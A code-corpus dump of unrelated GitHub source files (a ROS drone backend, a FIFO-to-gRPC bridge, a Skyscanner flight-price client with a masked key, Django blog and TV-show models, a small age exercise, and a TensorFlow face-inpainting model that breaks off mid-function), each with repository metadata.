8ee6093eaceb409bed04cc2f2521ef05d60abf34 | e5d993c9896b9691b3d1981c1eda13f13bd3ee42 | /preFinal/backend2.py | 50fc587f59dd2eaac5cdec5e90216fe7228ba411 | [] | no_license | mario8th/CompiledHive | 2af4bf88837edac8d0793a953122a7761d4e9d11 | b7190a8a5627385d45eb7ea637ae437d1425082c | refs/heads/master | 2020-04-19T08:33:32.335467 | 2019-04-30T03:58:30 | 2019-04-30T03:58:30 | 168,081,255 | 1 | 2 | null | 2019-04-18T06:09:01 | 2019-01-29T03:18:21 | Python | UTF-8 | Python | false | false | 12,218 | py | #!/usr/bin/env python
import numpy as np
import time
import rospy
import ast
from std_msgs.msg import String
from gui_ver2 import *
import math
import importlib
WARNDRONERADIUS = 0.2
STOPDRONERADIUS = 0.1
ERRORMARGIN = 0.0
backend = None
visualizationPub = rospy.Publisher('backtomonitorvis', String, queue_size=10)
consolePub = rospy.Publisher('backtomonitorconsole', String, queue_size=10)
destPub = rospy.Publisher('backtosim', String, queue_size=10)
visPubObstacle = rospy.Publisher('backtomonitorobstacles', String, queue_size=10)
visPubSensor = rospy.Publisher('backtomonitorsensors', String, queue_size=10)
visPubConfig = rospy.Publisher('backtomonitorconfig', String, queue_size=10)
logFile = ""
class BackendData:
def __init__(self, fullDroneList, destDict, pathDict, obstDict, visConfig, logConfig):
# Static Data
# Official drone order
self.fullDroneList = fullDroneList
# Path information
self.destDict = destDict
self.pathDict = pathDict
# obstacles and sesnsors
self.obstDict = obstDict
self.sensors = [[4.0,-4.0,0.0], [-4.0,-4.0,0.0], [4.0,4.0,0.0], [-4.0,4.0,0.0], [4.0,-4.0,8.0], [-4.0,-4.0,8.0], [4.0,4.0,8.0], [-4.0,4.0,8.0]]
# Config files
self.visConfig = visConfig
self.logConfig = logConfig
# Tracks major error occurence
self.quitBool = False
# Start locations
self.startLocations = []
pathDrones = 1.0
for drone in fullDroneList:
if drone in self.destDict:
self.startLocations.append(self.destDict[drone][0])
else:
self.startLocations.append([pathDrones, 2.0, 0.0])
pathDrones = round(pathDrones + 0.3, 2)
# Tracks current dest for each drone
self.destIndexDict = {}
for drone in self.destDict:
self.destIndexDict[drone] = 0
# Start drones at start locations
self.currentLocations = self.startLocations
self.currentDests = self.startLocations
# Import all flight path files
self.importDict = {}
for file in self.pathDict:
self.importDict[file] = importlib.import_module(file)
# Methods that check for events and return report strings
def checkForEvents(self):
self.checkObstacleCollide()
self.checkOutOfBounds()
self.checkDronesClose()
# Checks if Drones are within collision radius
def checkDronesClose(self):
for droneCount1, drone1 in enumerate(self.currentLocations):
for droneCount2, drone2 in enumerate(self.currentLocations):
if(droneCount1 < droneCount2):
#Compare distances
dist = (((drone1[0] - drone2[0]) * (drone1[0] - drone2[0])) +
((drone1[1] - drone2[1]) * (drone1[1] - drone2[1])) +
((drone1[2] - drone2[2]) * (drone1[2] - drone2[2])))
dist = math.sqrt(dist)
#Check for potential drone collision
if(dist < STOPDRONERADIUS):
self.activateQuitBool()
logString = "Stopping: "
logString += "Drone " + str(self.fullDroneList[droneCount1]) + " and Drone " + str(self.fullDroneList[droneCount2])
logString += " within stop radius"
self.toLog('E', logString)
elif(dist < WARNDRONERADIUS):
logString = "Caution: "
logString += "Drone " + str(self.fullDroneList[droneCount1]) + " and Drone " + str(self.fullDroneList[droneCount2])
logString += " within warning radius"
self.toLog('E', logString)
# Checks if a drone is within an obstacle
def checkObstacleCollide(self):
errorFlag = False
for obstacle in self.obstDict:
for drone in self.currentLocations:
if(pointWithinRectangle(drone, self.obstDict[obstacle][0], self.obstDict[obstacle][1])):
logString = str(drone) + ' in obstacle ' + str(obstacle)
self.toLog('E', logString)
# Checks if drone is out of bounds
def checkOutOfBounds(self):
#Find 2 opposite Sensors
sensor1 = self.sensors[0]
sensor2 = self.sensors[-1]
for sensor in self.sensors:
if(sensor1[0] != sensor[0] and sensor1[1] != sensor[1] and sensor1[2] != sensor[2]):
sensor2 = sensor
# Feed each drone into pointWithinRectangle
errorFlag = False
for drone in self.currentLocations:
errorFlag = errorFlag or not pointWithinRectangle(drone, sensor1, sensor2)
# Drone was out of bounds
if(errorFlag):
self.activateQuitBool()
#Publish to consolePub about flight ending because a drone flew out of bounds
logString = "Drone flew out of bounds"
self.toLog('E', logString)
# Activates wuit bool and sets all drones to land
def activateQuitBool(self):
global destPub
self.quitBool = True
newDests = self.startLocations
self.currentDests = newDests
destPub.publish(str(newDests))
# Checks which drones have reached dest and updates dests accordingly
def update(self):
# Get destinations for point by point path, gets dict back
pointDests = self.getPointDests()
# Get destinations for each function path, gets dict back
functionDests = self.getFunctionDests()
# Combine dest lists, in order by self.fullDroneList
newDests = []
for drone in self.fullDroneList:
if drone in pointDests:
newDests.append(pointDests[drone])
else:
newDests.append(functionDests[drone])
self.currentDests = newDests
def getPointDests(self):
pointDestDict = {}
for droneCount, drone in enumerate(self.fullDroneList):
if drone in self.destDict:
# Test location against destination
if(calcDistance(self.currentLocations[droneCount], self.currentDests[droneCount]) <= ERRORMARGIN):
# Drone within error margin, move to next to next destination
# Update Destination index
if(len(self.destDict[drone]) <= self.destIndexDict[drone] + 1):
self.destIndexDict[drone] = self.destIndexDict[drone]
else:
self.destIndexDict[drone] = self.destIndexDict[drone] + 1
pointDestDict[drone] = self.destDict[drone][self.destIndexDict[drone]]
return pointDestDict
def getFunctionDests(self):
pathDestDict = {}
# for each flight path
for path in self.pathDict:
# Package all drone locations for that path into one list
paramLocations = []
for drone in self.pathDict[path]:
paramLocations.append(self.currentLocations[self.fullDroneList.index(drone)])
# Send list to function and recieve new destinations
print path
newDests = self.importDict[path].flightPath(paramLocations)
# Reassemble lists into single dictionary
for droneCount, drone in enumerate(newDests):
pathDestDict[self.pathDict[path][droneCount]] = drone
return pathDestDict
def toLog(self, commandLetter, logString):
global logFile
# Take in command + string
# Test command against Config
# if logging that command, log
print logString
# Test if logging
if(self.logConfig[0]):
# Open File to log
log = open(logFile, 'a')
# Test for events and logging config for events
if(commandLetter == 'E' and self.logConfig[7]):
log.write(logString + "\n")
consolePub.publish(logString)
elif(commandLetter == 'L' and self.logConfig[2]):
log.write(logString + "\n")
log.close()
# Tests if point is within rectangle bounded by 2 opposite corners
def pointWithinRectangle(point, corner1, corner2):
withinRect = True
# Check X values within range
for xyzIndex in range(3):
if((point[xyzIndex] >= corner1[xyzIndex] and point[xyzIndex] <= corner2[xyzIndex]) or (point[xyzIndex] <= corner1[xyzIndex] and point[xyzIndex] >= corner2[xyzIndex])):
pass
else:
withinRect = False
return withinRect
# Forwards drone locations to vis
def forwardDroneLocs():
global backend, visualizationPub
visualizationPub.publish(str(backend.currentLocations))
def receivedLocations(data):
global backend, visualizationPub, destPub, consolePub
# Update currentlocs in backend
backend.currentLocations = ast.literal_eval(data.data)
backend.toLog('L', str(backend.currentLocations))
# Forward drone locations to vis
forwardDroneLocs()
backend.checkForEvents()
if(not backend.quitBool):
# Do calculations based on new locations, building new destinations
backend.update()
#Send destinations to sim
destPub.publish(str(backend.currentDests))
#
def receivedEStop(data):
global backend
# Publish receipt of Estop to console
backend.activateQuitBool()
def calcDistance(point1, point2):
dist = 0
dist += ((point1[0] - point2[0]) * (point1[0] - point2[0]))
dist += ((point1[1] - point2[1]) * (point1[1] - point2[1]))
dist += ((point1[2] - point2[2]) * (point1[2] - point2[2]))
return math.sqrt(dist)
def runBackend(fullDroneList, destDict, pathDict, obstDict, visConfig, logConfig):
# Get global publishers
global backend, visualizationPub, destPub, consolePub, visPubObstacle, visPubSensor, visPubConfig
# Initialize backend data
backend = BackendData(fullDroneList, destDict, pathDict, obstDict, visConfig, logConfig)
# Setup subscribers + ros stuff
rospy.init_node('backend', anonymous=True)
# Parse and publish obstacles and sensors to visualization to Initialize
obstaclePacket = []
for obstacleKey in obstDict:
obstaclePacket.append(obstDict[obstacleKey])
# Publish obstacles to initialize
visPubObstacle.publish(str(obstaclePacket))
visPubObstacle.publish(str(obstaclePacket))
time.sleep(0.1)
visPubObstacle.publish(str(obstaclePacket))
visPubObstacle.publish(str(obstaclePacket))
# Publish start locations to initialize
destPub.publish(str(backend.currentDests))
destPub.publish(str(backend.currentDests))
time.sleep(0.1)
destPub.publish(str(backend.currentDests))
destPub.publish(str(backend.currentDests))
visPubConfig.publish(str(visConfig))
visPubConfig.publish(str(visConfig))
time.sleep(0.1)
visPubConfig.publish(str(visConfig))
visPubConfig.publish(str(visConfig))
rospy.Subscriber('simtoback', String, receivedLocations)
rospy.Subscriber('monitortoback', String, receivedEStop)
rospy.spin()
def main():
global logFile
# Launch GUI to gather user input
flightData = launchGui()
print flightData
logFile = flightData[6]
# Parse user input
fullDroneList = []
# Dest list
for drone in flightData[0]:
fullDroneList.append(drone)
# Path list
for path in flightData[2]:
fullDroneList.extend(flightData[2][path])
runBackend(fullDroneList, flightData[0], flightData[2], flightData[3], flightData[4], flightData[5])
'''runBackend([2,1,3,4],
{ 2:[[2.0,-2.0,0.0],[2.0,-2.0,3.0],[-2.0,-2.0,3.0],[-2.0,2.0,3.0],[2.0,2.0,3.0],[1.0,1.0,1.0]],1:[[-4.0,-4.0,0.0],[-4.0,-4.0,5.0],[4.0,-4.0,5.0],[4.0,4.0,5.0],[-4.0,4.0,5.0],[1.0,1.0,1.0]]},
{"loopout": [3,4]},
{'object_0': ((1.0, 2.0, 1.0), (3.0, 3.0, 3.0))},
[True, 1,1,1,1,1],
[True, True, True, 2.0, True, False, False, True])'''
if __name__ == "__main__":
main()
# I want space
| [
"noreply@github.com"
] | mario8th.noreply@github.com |
c83201eb3b362d3fa7671149eb4f863aa7a5601b | 8c66bb75d4710ad3eb5ce9760ccc0d1fcb31605e | /python/medifor/v1/fifoconn.py | 912c39478af8850dfab65673afd3d15cb1e9a096 | [
"Apache-2.0"
] | permissive | xkortex/medifor | a53a093ca0d05a2e2a72f76ef9515ee699c4b387 | 484590bfa55671917a83c5c3b507b8c9ca3c423a | refs/heads/master | 2020-11-26T01:13:50.921745 | 2020-05-05T21:44:15 | 2020-05-05T21:44:15 | 228,918,250 | 0 | 0 | Apache-2.0 | 2019-12-18T20:41:33 | 2019-12-18T20:41:32 | null | UTF-8 | Python | false | false | 12,540 | py | #!/usr/bin/env python3
"""fifoconn.py
This can be imported as a library, to make use of FIFOConn, which allows for
simple sending of text or JSON messages to a FIFO service that expects
values as indicated below. To use the FIFOConn, use this file as an example,
or you can make your own:
#!/usr/bin/env python
input = vars().get('raw_input', input)
with FIFOConn() as fconn:
print("service input: use {!r}".format(fconn.thatRecv))
print("service output: use {!r}".format(fconn.thatSend))
input("start service now, using the above FIFOs, then hit Enter")
print(fconn.communicate("hey there"))
If your service just echos what you send it, for example, then the above will
print "hey there".
You can use this to manually test your FIFO service (e.g., MATLAB, see below)
by calling, e.g.,
req = WrapRequestProto(analytic_pb2.ImageManipulationRequest(
request_id='id_foo',
out_dir='/tmp/output'))
print(fconn.communicateJSON(req))
If you just run this as a binary, this program starts an analytic service on
the given port, and then spawns a specified child process. It opens up two
named pipes with which it can communicate with the child. All analytic requests
that come into this service are forwarded to the child's "input" pipe, and all
responses are expected to come through the child's "output" pipe.
The protobuf messages are converted to JSON for the purposes of transmission,
and wrapped in a larger dict, like this for the request:
request = {
"type": "imgmanip",
"value": actual_request_dict,
}
Similarly, responses have the form:
response = {
"code": "OK",
"value": actual_response_dict,
}
The request and response values are both JSON representations of protocol
messages, as expected by the analytic protocol. The following types are allowed
in requests, with their corresponding protobuf names:
imgmanip: ImageManipulationRequest -> ImageManipulation
vidmanip: VideoManipulationRequest -> VideoManipulation
imgsplice: ImageSpliceRequest -> ImageSplice
imgcammatch: ImageCameraMatchRequest -> ImageCameraMatch
If the protobuf name is not recognized, it is used as the type name in requests.
Note that proto fields are converted from snake case (e.g., 'out_dir') to camel
case ('outDir') when converting to JSON. The conversion happens automatically,
you just need to be aware of how it works when trying to produce JSON directly.
Thus, a JSON response would use the field name 'optOut' instead of the
proto-specified 'opt_out' as per the proto3 standard.
An Example with MATLAB:
One use for this is running MATLAB code. Given MATLAB code that uses a suitable
library for communicating via the named pipes (like AnalyticService.m), you can
start your MATLAB code as a child process with this service.
Assume your main script is located in "my_analytic.m". You can start this child
process with named pipes sent in environment variables as indicated above by
issuing the following command:
./fifoconn.py -- matlab -nodisplay -nosplash -nodesktop -r my_analytic
This starts up MATLAB with the instruction to run 'my_analytic.m', and removes
all of the cruft that you don't want on the command line. Since it doesn't
specify the in_key or out_key, the names of the FIFOs are set in environment
variables in the child process, as follows:
input fifo: ANALYTIC_FIFO_IN
output fifo: ANALYTIC_FIFO_OUT
These are *from the perspective of the child process*. You can also have them
sent on the child's command line as flags, using, for example
./fifoconn.py --in_key=-in_fifo --out_key=-out_fifo -- myproc
In this example, the child will be called thus:
myproc -in_fifo <child_in_fifo_name> -out_fifo <child_out_fifo_name>
If an = suffix is specified, then flags are specified as, e.g., "--in_fifo=<name>".
In all cases, the prefix and suffix are preserved exactly. The '=' suffix
additionally consumes the space after the flag.
"""
import argparse
import json
import logging
import os.path
import select
import shlex
import shutil
import subprocess
import sys
import tempfile
import threading
import time
from google.protobuf import json_format
from medifor.v1.analyticservice import AnalyticService
_DEFAULT_CHILD_IN_KEY = 'ANALYTIC_FIFO_IN'
_DEFAULT_CHILD_OUT_KEY = 'ANALYTIC_FIFO_OUT'
_PROTO_TYPE_MAP = {
'ImageManipulationRequest': 'imgmanip',
'VideoManipulationRequest': 'vidmanip',
'ImageSpliceRequest': 'imgsplice',
'ImageCameraMatchRequest': 'imgcammatch',
}
class TimeoutError(IOError):
def __init__(self, op, timeout):
return super(TimeoutError, self).__init__("timed out with op {!r} after {} seconds".format(op, timeout))
def RecvLine(f, timeout=0):
selArgs = [[f], [], [f]]
if timeout:
selArgs.append(timeout)
if not any(select.select(*selArgs)):
raise TimeoutError("read", timeout)
return f.readline()
def SendLine(f, data, timeout=0):
selArgs = [[], [f], [f]]
if timeout:
selArgs.append(timeout)
if not any(select.select(*selArgs)):
raise TimeoutError("write", timeout)
f.write(data + '\n')
f.flush()
def WrapRequestProto(req):
return {
'type': _PROTO_TYPE_MAP.get(req.DESCRIPTOR.name, req.DESCRIPTOR.name),
'value': json_format.MessageToDict(req),
}
def UnwrapResponseProto(respDict, respProto):
code = respDict.get('code', 'UNKNOWN')
value = respDict.get('value')
if code == 'OK':
json_format.ParseDict(value, respProto)
return code
class FIFOConn:
def __init__(self, pipeNames=None, timeout=0):
self.timeout = timeout
self.lock = threading.Lock()
self.fifoDir = None
if not pipeNames:
self.fifoDir = tempfile.mkdtemp()
self.recvName = os.path.join(self.fifoDir, 'recv-child')
self.sendName = os.path.join(self.fifoDir, 'send-child')
os.mkfifo(self.recvName)
os.mkfifo(self.sendName)
else:
self.recvName, self.sendName = pipeNames
self.thatRecv = self.sendName
self.thatSend = self.recvName
self.sender = None
self.receiver = None
def _ensureOpen(self):
if not (self.sender or self.receiver):
# TODO: add os.O_NONBLOCK, loop and sleep on OSError until timeout.
s = os.open(self.sendName, os.O_WRONLY)
r = os.open(self.recvName, os.O_RDONLY)
self.sender = os.fdopen(s, 'wt')
self.receiver = os.fdopen(r, 'rt')
def close(self):
with self.lock:
if self.sender:
self.sender.close()
if self.receiver:
self.receiver.close()
if self.fifoDir:
shutil.rmtree(self.fifoDir)
def __enter__(self):
return self
def __exit__(self, *unused_exc):
self.close()
def communicate(self, data):
with self.lock:
self._ensureOpen()
SendLine(self.sender, data, timeout=self.timeout)
return RecvLine(self.receiver, timeout=self.timeout)
def communicateJSON(self, obj):
return json.loads(self.communicate(json.dumps(obj)))
def spawnChild(fconn, args, inKey=None, outKey=None):
if inKey is None:
inKey = _DEFAULT_CHILD_IN_KEY
if outKey is None:
outKey = _DEFAULT_CHILD_OUT_KEY
args = args[:]
env = os.environ.copy()
if inKey.startswith('-'):
if inKey.endswith('='):
args.append(inKey + shlex.quote(fconn.thatRecv))
else:
args.extend([inKey, fconn.thatRecv])
else:
env[inKey] = fconn.thatRecv
if outKey.startswith('-'):
if outKey.endswith('='):
args.append(outKey + shlex.quote(fconn.thatSend))
else:
args.extend([outKey, fconn.thatSend])
else:
env[outKey] = fconn.thatSend
# Never inherit stdin (not interactive!), always inherit stdout and stderr for logging.
return subprocess.Popen(args, env=env, stdin=subprocess.DEVNULL, stdout=None, stderr=None)
def main(args):
svc = AnalyticService()
lock = threading.Lock()
with FIFOConn(timeout=args.resp_timeout) as fconn:
child = spawnChild(fconn,
args=args.child_args,
inKey=args.in_key,
outKey=args.out_key)
print("Child process started with PID {}".format(child.pid))
fatal = []
def communicateProtos(req, resp):
try:
reqDict = WrapRequestProto(req)
respDict = fconn.communicateJSON(reqDict)
code = UnwrapResponseProto(respDict, resp)
if code == 'OK':
return
if code == 'UNIMPLEMENTED':
raise NotImplementedError(reqDict.get("type"))
elif code in ('UNKNOWN', 'INTERNAL'):
raise RuntimeError(respDict.get("value"))
else:
raise RuntimeError('unknown status code {!r}: {}'.format(code, respDict))
except IOError as e:
if e.errno == 32: # Broken Pipe
with lock:
fatal.append(e)
raise e
except TimeoutError as e:
# Timeouts are fatal because they put the fifo into an unknown
# state for the next request.
with lock:
fatal.append(e)
raise e
svc.RegisterImageManipulation(communicateProtos)
svc.RegisterVideoManipulation(communicateProtos)
svc.RegisterImageSplice(communicateProtos)
svc.RegisterImageCameraMatch(communicateProtos)
server = svc.Start(analytic_port=args.port)
try:
while True:
with lock:
if fatal:
raise fatal[0]
time.sleep(5)
childRet = child.poll()
# If the child exited, trigger server exit.
if childRet is not None:
raise StopIteration(childRet)
except StopIteration as e:
print("Child exited with code {}".format(e))
server.stop(0)
except KeyboardInterrupt:
print("Server stopped")
server.stop(0)
print("Killing child {}".format(child.pid))
child.kill()
return 0
except Exception as e:
print("Caught exception: {}".format(e))
server.stop(0)
print("Killing child {}".format(child.pid))
child.kill()
return -1
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=('Start an analytic service that spawns a child process and communicates\n'
'with it via temporary named pipes.'))
parser.add_argument('--port', dest='port', type=int, default=50051,
help='Port to listen on for gRPC requests.')
parser.add_argument('--in_key', dest='in_key', type=str, default=_DEFAULT_CHILD_IN_KEY,
help=('Name of environment variable used by the child process to find its input pipe.\n'
'If it starts with "-", it will be sent as a flag. Trailing "=" forces the flag\n'
'to use the "=" convention. The prefix and suffix are preserved as is. Examples:\n'
'\n'
'--in_key=FOO : the child gets its input pipe from env var FOO\n'
'--in_key=--foo : the child gets its input pipe in args, as "--foo <name>"\n'
'--in_key=-foo= : the child gets its input pipe in args, as "-foo=<name>"\n'))
parser.add_argument('--out_key', dest='out_key', type=str, default=_DEFAULT_CHILD_OUT_KEY,
help='Name child process uses to find its output named pipe. See --in_key for format')
parser.add_argument('--resp_timeout', dest='resp_timeout', type=float, default=0,
help='Maximum time to wait for a FIFO response, in floating-point seconds.')
parser.add_argument('child_args', type=str, nargs='+',
help='Child command line arguments, including binary. Specify after flags using "--".')
sys.exit(main(parser.parse_args()))
| [
"nicholasburnett@datamachines.io"
] | nicholasburnett@datamachines.io |
c3d01513d796e2b5c9677bf7d1521c455e325d50 | 194b48b62a0da2d35f2f90dadba354b682119d7b | /flights.py | 3725d1c1fbc4f8ac2a4d917155cd950a4381df45 | [] | no_license | JanAdamiak/Flights-prices-tracker | f3835c9970d62bc2375017098b424c16c0baffaa | 1f723b2ae30f1125684a6b83ad393a8929168549 | refs/heads/master | 2020-07-16T19:57:34.417496 | 2019-09-04T13:49:54 | 2019-09-04T13:49:54 | 205,857,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,834 | py | rapidapi_host = 'skyscanner-skyscanner-flight-search-v1.p.rapidapi.com'
rapidapi_key = '5b*************************************************d8'
def get_placeID(location):
apicall = 'https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices/autosuggest/v1.0/UK/USD/en-GB/?query=' + str(location)
headers = {
'X-RapidAPI-Host': rapidapi_host,
'X-RapidAPI-Key': rapidapi_key
}
r = requests.get(apicall, headers=headers)
body = json.loads(r.text)
places = body['Places']
top_place_id = places[0]['PlaceId']
return top_place_id
def get_country_code(country):
headers={
'X-RapidAPI-Host': rapidapi_host,
'X-RapidAPI-Key': rapidapi_key
}
response = requests.get('https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices/reference/v1.0/countries/en-GB',
headers=headers)
response = json.loads(response.text)
country_code = [item['Code'] for item in response['Countries'] if item['Name'] == country][0]
return country_code
def create_session(origin, destination, user_country_code, outbound_date):
apicall = 'https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices/pricing/v1.0'
headers = {
'X-RapidAPI-Host': rapidapi_host,
'X-RapidAPI-Key': rapidapi_key,
'Content-Type': 'application/x-www-form-urlencoded'
}
params={
'cabinClass': 'economy',
'children': 1,
'infants': 0,
'country': user_country_code,
'currency': 'GBP',
'locale': 'en-GB',
'originPlace': origin,
'destinationPlace': destination,
'outboundDate': outbound_date,
'adults': 3
}
r = requests.post(apicall, headers=headers, data=params)
session_key = r.headers['Location'].split('/')[-1]
return session_key
def poll_results(session_key):
apicall = 'https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices/pricing/uk2/v1.0/{}?sortType=price&pageIndex=0&pageSize=10'.format(session_key)
headers = {
'X-RapidAPI-Host': rapidapi_host,
'X-RapidAPI-Key': rapidapi_key
}
r = requests.get(apicall, headers=headers)
body = json.loads(r.text)
itineraries = body['Itineraries']
return itineraries
def search_flights(origin, destination, user_country, outbound_date):
country_code = get_country_code(user_country)
origin_id = get_placeID(origin)
destination_id = get_placeID(destination)
session_key = create_session(origin_id, destination_id, country_code, outbound_date)
itineraries = poll_results(session_key)
results = []
for i in range(len(itineraries)):
for j in range(len(itineraries[i]['PricingOptions'])):
url = itineraries[i]['PricingOptions'][j]['DeeplinkUrl']
price = itineraries[i]['PricingOptions'][j]['Price']
results.append((price, url))
return results
| [
"noreply@github.com"
] | JanAdamiak.noreply@github.com |
d48512e2ee97abb1cf3c6021d83523f168de31df | f3fc5cd59cfd65c5e5d51172b079957e849a925e | /blog/models.py | d430c2a9da72dcd287bb4def656208b7658908ac | [] | no_license | 994850029/BBS | e636070d765ea92f79bd4ecd40cbcef7bf0b15ff | 9ea09b99572994cee56cb8175df6b2978066ff2c | refs/heads/master | 2020-04-10T22:36:28.959686 | 2018-12-11T12:31:10 | 2018-12-11T12:31:10 | 161,327,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,190 | py | from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class UserInfo(AbstractUser):
id = models.AutoField(primary_key=True)
phone = models.CharField(max_length=16)
avatar = models.FileField(upload_to='avatar/', default='avatar/default.png')
create_date = models.DateTimeField(auto_now_add=True)
blog = models.OneToOneField(to='Blog', to_field='id',null=True,blank=True)
class Meta:
# admin中显示表名
verbose_name='用户表'
# admin中表名s去掉
verbose_name_plural=verbose_name
class Blog(models.Model):
id = models.AutoField(primary_key=True)
title = models.CharField(max_length=64, null=True,blank=True)
site_name = models.CharField(max_length=64)
theme = models.CharField(max_length=64)
class Meta:
verbose_name = '博客'
verbose_name_plural = verbose_name
def __str__(self):
return self.site_name
class Category(models.Model):
id = models.AutoField(primary_key=True)
title = models.CharField(max_length=64)
blog = models.ForeignKey(to='Blog', to_field='id', null=True,blank=True)
def __str__(self):
return self.title
class Tag(models.Model):
id = models.AutoField(primary_key=True)
title = models.CharField(max_length=64)
blog = models.ForeignKey(to='Blog', to_field='id', null=True,blank=True)
def __str__(self):
return self.title
class Article(models.Model):
id = models.AutoField(primary_key=True)
title = models.CharField(max_length=64)
desc = models.CharField(max_length=255)
create_time = models.DateTimeField(auto_now_add=True)
commit_num = models.IntegerField(default=0)
up_num = models.IntegerField(default=0)
down_num = models.IntegerField(default=0)
content = models.TextField()
category = models.ForeignKey(to='Category', to_field='id', null=True,blank=True)
blog = models.ForeignKey(to='Blog', to_field='id', null=True,blank=True)
tag = models.ManyToManyField(to='Tag', through='ArticleToTag', through_fields=('article', 'tag'))
class Meta:
verbose_name = '文章'
verbose_name_plural = verbose_name
def __str__(self):
return self.title
class ArticleToTag(models.Model):
id = models.AutoField(primary_key=True)
article = models.ForeignKey(to='Article', to_field='id')
tag = models.ForeignKey(to='Tag', to_field='id')
class Commit(models.Model):
id = models.AutoField(primary_key=True)
user = models.ForeignKey(to='UserInfo', to_field='id')
article = models.ForeignKey(to='Article', to_field='id')
content = models.TextField()
commit_time = models.DateTimeField(auto_now_add=True)
parent = models.ForeignKey(to='self', to_field='id', null=True)
class Meta:
verbose_name = '评论'
verbose_name_plural = verbose_name
class UpAndDown(models.Model):
id = models.AutoField(primary_key=True)
user = models.ForeignKey(to='UserInfo', to_field='id')
article = models.ForeignKey(to='Article', to_field='id')
is_up = models.BooleanField()
class Meta:
unique_together = (('user', 'article'),)
| [
"zhoujianhao1996@163.com"
] | zhoujianhao1996@163.com |
5bbd81e71786da7c4b8ed168d164b7ea168232c6 | 2e0e6b21fcfa203b42d90155eb2a341706586305 | /apps/tv_show_app/models.py | 5c05bdb6b5a2710d362f0e8a37ad677ee73f485f | [] | no_license | jesserowan/tv_show_app | e020f5a8b0f44f984707b00e2549ca51666be288 | 9368de5ecf03fb01e76d07e49bba734aaa731dca | refs/heads/master | 2020-04-11T00:57:08.595255 | 2018-12-12T17:33:08 | 2018-12-12T17:33:08 | 161,401,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | from django.db import models
class MovieManager(models.Manager):
def validator(self, form):
errors = {}
if len(form['title']) < 2:
errors["title"] = "Show title must be at least three characters."
if len(form['network']) < 3:
errors['network'] = "Show network must be at least three characters."
if not form['air_date']:
errors['date'] = "You must enter an air date."
if len(form['description']) > 0 and len(form['description']) < 10:
errors['description'] = "Show description is optional, but if entered, it must be at least ten characters."
return errors
class Movie(models.Model):
title = models.CharField(max_length=255)
network = models.CharField(max_length=255)
air_date = models.DateField()
description = models.TextField(max_length=1000)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = MovieManager()
def __repr__(self):
return f"<ID {self.id} - Title: {self.title} Network: {self.network}>" | [
"jesserowan@gmail.com"
] | jesserowan@gmail.com |
d2278f13afd43cc63a7558c4ca8f27c6351c5013 | d6c54a9cb57a6f5b88aaef157e9e2870e4fd86af | /Day 4/day4.py | 7c6356fe5515b7450a46379353f89dffb6322346 | [] | no_license | vishaka-mohan/30-Days-of-Code-Challenge | fce1c1b9d9760f8d3308326d3244a2bfa8f5e971 | 8f3197aa9e9075ab5bebf442545f739e82327507 | refs/heads/main | 2023-02-02T16:31:07.828019 | 2020-12-21T15:22:50 | 2020-12-21T15:22:50 | 314,985,699 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 852 | py | class Person:
def __init__(self,initialAge):
# Add some more code to run some checks on initialAge
if initialAge < 0:
self.age = 0
print("Age is not valid, setting age to 0.")
else:
self.age = initialAge
def amIOld(self):
# Do some computations in here and print out the correct statement to the console
if self.age < 13:
print("You are young.")
elif self.age >= 13 and self.age < 18:
print("You are a teenager.")
else:
print("You are old.")
def yearPasses(self):
# Increment the age of the person in here
self.age += 1
t = int(input())
for i in range(0, t):
age = int(input())
p = Person(age)
p.amIOld()
for j in range(0, 3):
p.yearPasses()
p.amIOld()
print("")
| [
"pflight0211@gmail.com"
] | pflight0211@gmail.com |
303fc6326ae21120dac1f0562abb3e0ff08d4265 | e7e422cfbf3928daa9d03bb54957843407ccff64 | /experimental/gcp/trainer/model.py | 356ef1284071d5cba032f00efc89b28945e096b2 | [] | no_license | gsnaider/two-face-inpainting | ec9c144a830eeb3e7379a5b2230c43058b953423 | eb9d1f31792634f0922086f83361ccc0d18728c3 | refs/heads/master | 2023-07-06T13:25:58.113293 | 2023-06-22T12:45:11 | 2023-06-22T12:45:11 | 155,004,562 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,495 | py | import tensorflow as tf
def make_encoders():
"""Returns the gen and disc encoders."""
vgg16 = tf.keras.applications.vgg16.VGG16(include_top=False,
weights='imagenet',
input_tensor=None,
input_shape=(128, 128, 3))
vgg16.trainable = False
# Remove last 5 conv layers.
encoder = tf.keras.Model(inputs = vgg16.inputs, outputs=vgg16.layers[-6].output)
encoder.trainable = False
return encoder, vgg16
def make_generator_model(gen_encoder):
masked_image = tf.keras.Input(shape=(128, 128, 3,), name='masked_image')
masked_encoding = gen_encoder(masked_image)
# 16x16x512
reference_image = tf.keras.Input(shape=(128, 128, 3,), name='reference_image')
reference_encoding = gen_encoder(reference_image)
# 16x16x512
encoding = tf.keras.layers.concatenate([masked_encoding, reference_encoding], axis=-1)
# 16x16x1024
# Decoder
encoding = tf.keras.layers.Conv2DTranspose(256, (2, 2),
strides=(1, 1),
padding='same',
use_bias=False,
input_shape=(16,16,1024))(encoding)
encoding = tf.keras.layers.BatchNormalization()(encoding)
encoding = tf.keras.layers.LeakyReLU()(encoding)
# 16x16x256
encoding = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same', use_bias=False)(encoding)
encoding = tf.keras.layers.BatchNormalization()(encoding)
encoding = tf.keras.layers.LeakyReLU()(encoding)
# 32x32x32
generated_patch = tf.keras.layers.Conv2DTranspose(3, (5, 5),
strides=(1, 1),
padding='same',
use_bias=False,
activation='sigmoid')(encoding)
# 32x32x3
return tf.keras.Model(inputs=[masked_image, reference_image], outputs=generated_patch)
def make_discriminator_model(disc_encoder):
image = tf.keras.Input(shape=(128, 128, 3,), name='image')
image_encoding = disc_encoder(image)
# 4x4x512
image_encoding = tf.keras.layers.Conv2D(64, (1, 1),
strides=(1, 1),
padding='same',
input_shape=(4, 4, 512))(image_encoding)
